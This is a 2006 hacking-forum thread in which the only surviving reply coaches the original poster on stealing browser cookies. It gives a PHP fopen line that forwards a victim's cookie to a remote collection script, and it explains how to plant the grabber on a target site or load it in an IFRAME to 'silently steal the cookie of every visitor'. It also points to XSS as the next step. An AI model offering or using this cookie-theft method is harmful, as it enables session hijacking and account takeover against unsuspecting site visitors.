Previous Thread
Next Thread
Print Thread
Rate Thread
#19395 02/09/06 05:18 AM
Joined: Jan 2006
Posts: 8
B
Junior Member
OP Offline
Junior Member
B
Joined: Jan 2006
Posts: 8
Post deleted by Bronavich

Last edited by Bronavich; 10/27/06 03:00 PM.
Joined: Jun 2003
Posts: 807
Likes: 2
G
UGN Super Poster
Offline
UGN Super Poster
G
Joined: Jun 2003
Posts: 807
Likes: 2
Ok, here's my understanding of the scenario. You have the cookie grabbing script on site A, and want it to be saved on the server hosting site B. If this is the case, you would have to have site A host some sort of script to forward all of the necessary information that the browser sends to the server at site A, and have a script setup on site B to write the information it recieves to a text file. If all you're interested in is the cookie, you could easily write a script to request the script at site B, sending the cookie. This would be accomplished somewhere along the lines of:
Code
fopen("http://www.sitename.tld/path/to/file/scriptname.php?str=$cookie", "r");
In fact, all the script at site A would need to do in this case is to recieve the cookie you want to steal via a GET or COOKIE variable ($_GET or $_COOKIE depending on how you want to do it) and use define the $cookie variable in the fopen function.

Now, the question of embedding it into a page is another story. If you were to actually gain access to a file, you could add the script at site A's code to a page on the target site and, using $_COOKIE, silently steal the cookie of every visitor to that site. You could also upload the script onto the target site in question and add the IFRAME html tag into any page there, and if you had a user view it, their browser would request the script, and send the applicable cookies.

Of course, you need to understand, you can't 'embed' a remote script into the site via IFRAME because browsers will only send cookies to the site domain the cookie is set to be sent to. Also, with the first option, if the PATH of a cookie is set, it will only send the cookie to a script in the PATH that the cookie is instructed to be sent to. This is why 'cookie stealing' is more complicated than writing a simple script (hence the name cookie grabber for my script).

If you really want to steal cookies, you should look into XSS, javascript, HTML, the HTTP RFC, and how cookies are used by browsers.

As far as PHP functions you should be concerned with, start with...

fopen()
fread()
fwrite()
while()
for()
header()
explode()
implode()
foreach()
array()
setcookie()

and the global variables $_GET and $_COOKIE

I'm not sure I understand your comprehension of the $_COOKIE variable. By specifying no cookie name in the cookie variable, you will not return any value. The $_COOKIE variable is an array.


Link Copied to Clipboard
Member Spotlight
Phatal
Phatal
Houston, TX
Posts: 298
Joined: April 2004
Forum Statistics
Forums41
Topics33,840
Posts68,858
Average Daily Posts1
Members2,176
Most Online3,253
Jan 13th, 2020
Latest Postings
Where and how do you torrent?
by danni75 - 03/01/24 05:58 AM
Animation,
by JohanKaariainen - 08/15/19 01:18 AM
Blackbeard.....
by Gremelin - 10/03/18 07:02 PM
my old account still exists!
by Crime - 08/10/18 02:47 PM
Okay WTF?
by HenryMiring - 09/27/17 01:45 AM
The History Thread...
by Gremelin - 08/11/17 12:11 PM
My friend NEEDS your HELP!
by Lena01 - 07/21/17 12:06 AM
I'm having fun with this guy.
by gabithompson730 - 07/20/17 01:50 AM
I want to upgrade my phone
by gabithompson730 - 07/20/17 01:49 AM
Doom 3
by Cyrez - 09/11/14 08:58 PM
Amazon Gift Card Generator/KeyGen?te
by Gecko666 - 08/22/14 09:21 AM
AIM scene 99-03
by lavos - 09/02/13 08:06 AM
Planetside 2
by Crime - 03/04/13 07:10 AM
Beta Testers Wanted
by Crime - 03/04/13 06:55 AM
Hello Everyone
by Gremelin - 02/12/12 06:01 PM
Tracfone ESN Generator
by Zanvin Green - 01/18/12 01:31 PM
Python 3 issue
by Testing - 12/17/11 09:28 PM
tracfone airtime
by Drache86 - 07/30/11 03:37 AM
Backdoors and the Infinite
by ZeroCoolStar - 07/10/11 03:52 AM
HackThisZIne #12 Releaseed!
by Pipat2 - 04/28/11 09:20 PM
gang wars? l33t-wars?
by Gremelin - 04/28/11 05:56 AM
Consolidate Forums
by diggin2deep - 04/21/11 10:02 AM
LAN Hacking Noob
by Gremelin - 03/12/11 12:42 AM
Top Posters
UGN Security 41,392
Gremelin 7,203
§intå× 3,255
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Top Likes Received
Ghost 2
Cyrez 1
Girlie 1
unreal 1
Crime 1
Powered by UBB.threads™ PHP Forum Software 7.7.5